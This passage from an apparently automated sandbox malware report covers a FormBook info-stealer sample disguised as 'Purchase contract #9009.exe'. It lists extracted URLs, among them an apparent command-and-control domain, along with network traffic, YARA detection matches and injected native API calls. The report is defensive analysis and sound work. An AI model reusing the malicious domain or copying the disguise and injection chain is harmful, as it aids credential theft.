          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otf
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-b
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot?#iefix
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.otf
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.svg#ubuntu-r
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.ttf
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff2
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/js/min.js?v2.2
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/arrow.png)
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/bodybg.png)
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/kwbg.jpg)
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/libg.png)
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/libgh.png)
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/logo.png)
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/search-icon.png)
          Source: Purchase contract #9009.exe, 00000001.00000002.667717817.0000000002951000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000005.00000000.666382323.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: Purchase contract #9009.exe, 00000001.00000003.641742892.00000000054C7000.00000004.00000001.sdmp, Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: Purchase contract #9009.exe, 00000001.00000003.641859108.00000000054C6000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com
          Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: Purchase contract #9009.exe, 00000001.00000003.641859108.00000000054C6000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.como.
          Source: Purchase contract #9009.exe, 00000001.00000003.642994387.00000000054C7000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comva
          Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: Purchase contract #9009.exe, 00000001.00000003.644334757.00000000054FD000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/
          Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: Purchase contract #9009.exe, 00000001.00000003.645950157.00000000054FD000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
          Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: Purchase contract #9009.exe, 00000001.00000003.645781018.00000000054FD000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlv
          Source: Purchase contract #9009.exe, 00000001.00000003.645715148.00000000054CB000.00000004.00000001.sdmp, Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: Purchase contract #9009.exe, 00000001.00000002.666374405.0000000000BE7000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comcea
          Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: Purchase contract #9009.exe, 00000001.00000003.641605989.00000000054C4000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: Purchase contract #9009.exe, 00000001.00000003.641605989.00000000054C4000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnL
          Source: Purchase contract #9009.exe, 00000001.00000003.648690279.00000000054F7000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/
          Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: Purchase contract #9009.exe, 00000001.00000003.648690279.00000000054F7000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/~;
          Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://www.mtsnurulislamsby.com/10_Best_Mutual_Funds.cfm?fp=nC8Pk0gfsEigB97umX6ZboCBtPUHMYhCzaY6Rbgi
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://www.mtsnurulislamsby.com/Best_Penny_Stocks.cfm?fp=nC8Pk0gfsEigB97umX6ZboCBtPUHMYhCzaY6RbgieN1
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://www.mtsnurulislamsby.com/Credit_Card_Application.cfm?fp=nC8Pk0gfsEigB97umX6ZboCBtPUHMYhCzaY6R
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://www.mtsnurulislamsby.com/High_Speed_Internet.cfm?fp=nC8Pk0gfsEigB97umX6ZboCBtPUHMYhCzaY6Rbgie
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://www.mtsnurulislamsby.com/Migraine_Pain_Relief.cfm?fp=nC8Pk0gfsEigB97umX6ZboCBtPUHMYhCzaY6Rbgi
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://www.mtsnurulislamsby.com/Work_from_Home.cfm?fp=nC8Pk0gfsEigB97umX6ZboCBtPUHMYhCzaY6RbgieN12hb
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://www.mtsnurulislamsby.com/display.cfm
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://www.mtsnurulislamsby.com/fashion_trends.cfm?fp=nC8Pk0gfsEigB97umX6ZboCBtPUHMYhCzaY6RbgieN12hb
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://www.mtsnurulislamsby.com/n8ba/?3fu=S2NOBXxegNI52ult/GTqJZ9TvZOj5eG5l/LBY5m0t3ElylZ3sbPSB2bMMu
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://www.mtsnurulislamsby.com/px.js?ch=1
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://www.mtsnurulislamsby.com/px.js?ch=2
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://www.mtsnurulislamsby.com/sk-logabpstatus.php?a=eFZNZlhSdFVpS3duNGs2T2hoQ25jOWtLbFlraHVGVkFYVy
          Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: Purchase contract #9009.exe, 00000001.00000003.641815533.00000000054C6000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49683
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49682
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49681
          Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49682 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49693
          Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49690
          Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49683 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
          Source: unknownNetwork traffic detected: HTTP traffic on port 49681 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.904866229.0000000002EA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.904297754.00000000007A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.717327581.0000000001510000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.717304583.00000000014E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.668891023.00000000035D9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.716913702.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.904866229.0000000002EA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.904866229.0000000002EA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.904297754.00000000007A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.904297754.00000000007A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.717327581.0000000001510000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.717327581.0000000001510000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.717304583.00000000014E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.717304583.00000000014E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.668891023.00000000035D9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.668891023.00000000035D9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.716913702.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.716913702.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: Purchase contract #9009.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_004181C0 NtCreateFile,4_2_004181C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00418270 NtReadFile,4_2_00418270
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_004182F0 NtClose,4_2_004182F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_004183A0 NtAllocateVirtualMemory,4_2_004183A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0041826C NtReadFile,4_2_0041826C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00418215 NtCreateFile,4_2_00418215
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_004182EA NtClose,4_2_004182EA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E9910 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_015E9910
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E99A0 NtCreateSection,LdrInitializeThunk,4_2_015E99A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E9840 NtDelayExecution,LdrInitializeThunk,4_2_015E9840
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E9860 NtQuerySystemInformation,LdrInitializeThunk,4_2_015E9860
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E98F0 NtReadVirtualMemory,LdrInitializeThunk,4_2_015E98F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E9A50 NtCreateFile,LdrInitializeThunk,4_2_015E9A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E9A00 NtProtectVirtualMemory,LdrInitializeThunk,4_2_015E9A00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E9A20 NtResumeThread,LdrInitializeThunk,4_2_015E9A20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E9540 NtReadFile,LdrInitializeThunk,4_2_015E9540
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E95D0 NtClose,LdrInitializeThunk,4_2_015E95D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E9710 NtQueryInformationToken,LdrInitializeThunk,4_2_015E9710
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E9FE0 NtCreateMutant,LdrInitializeThunk,4_2_015E9FE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E9780 NtMapViewOfSection,LdrInitializeThunk,4_2_015E9780
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E97A0 NtUnmapViewOfSection,LdrInitializeThunk,4_2_015E97A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E9660 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_015E9660
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E96E0 NtFreeVirtualMemory,LdrInitializeThunk,4_2_015E96E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E9950 NtQueueApcThread,4_2_015E9950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E99D0 NtCreateProcessEx,4_2_015E99D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015EB040 NtSuspendThread,4_2_015EB040
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E9820 NtEnumerateKey,4_2_015E9820
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E98A0 NtWriteVirtualMemory,4_2_015E98A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E9B00 NtSetValueKey,4_2_015E9B00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015EA3B0 NtGetContextThread,4_2_015EA3B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E9A10 NtQuerySection,4_2_015E9A10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E9A80 NtOpenDirectoryObject,4_2_015E9A80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E9560 NtWriteFile,4_2_015E9560
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015EAD30 NtSetContextThread,4_2_015EAD30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E9520 NtWaitForSingleObject,4_2_015E9520
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E95F0 NtQueryInformationFile,4_2_015E95F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E9770 NtSetInformationFile,4_2_015E9770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015EA770 NtOpenThread,4_2_015EA770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E9760 NtOpenProcess,4_2_015E9760
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015EA710 NtOpenProcessToken,4_2_015EA710
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E9730 NtQueryVirtualMemory,4_2_015E9730
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E9650 NtQueryValueKey,4_2_015E9650
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E9670 NtQueryInformationProcess,4_2_015E9670
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E9610 NtEnumerateValueKey,4_2_015E9610
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E96D0 NtCreateKey,4_2_015E96D0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B395D0 NtClose,LdrInitializeThunk,9_2_04B395D0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B39540 NtReadFile,LdrInitializeThunk,9_2_04B39540
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B396E0 NtFreeVirtualMemory,LdrInitializeThunk,9_2_04B396E0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B396D0 NtCreateKey,LdrInitializeThunk,9_2_04B396D0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B39660 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_04B39660
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B39650 NtQueryValueKey,LdrInitializeThunk,9_2_04B39650
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B39780 NtMapViewOfSection,LdrInitializeThunk,9_2_04B39780
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B39FE0 NtCreateMutant,LdrInitializeThunk,9_2_04B39FE0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B39710 NtQueryInformationToken,LdrInitializeThunk,9_2_04B39710
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B39860 NtQuerySystemInformation,LdrInitializeThunk,9_2_04B39860
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B39840 NtDelayExecution,LdrInitializeThunk,9_2_04B39840
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B399A0 NtCreateSection,LdrInitializeThunk,9_2_04B399A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B39910 NtAdjustPrivilegesToken,LdrInitializeThunk,9_2_04B39910
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B39A50 NtCreateFile,LdrInitializeThunk,9_2_04B39A50
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B395F0 NtQueryInformationFile,9_2_04B395F0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B3AD30 NtSetContextThread,9_2_04B3AD30
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B39520 NtWaitForSingleObject,9_2_04B39520
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B39560 NtWriteFile,9_2_04B39560
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B39610 NtEnumerateValueKey,9_2_04B39610
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B39670 NtQueryInformationProcess,9_2_04B39670
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B397A0 NtUnmapViewOfSection,9_2_04B397A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B39730 NtQueryVirtualMemory,9_2_04B39730
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B3A710 NtOpenProcessToken,9_2_04B3A710
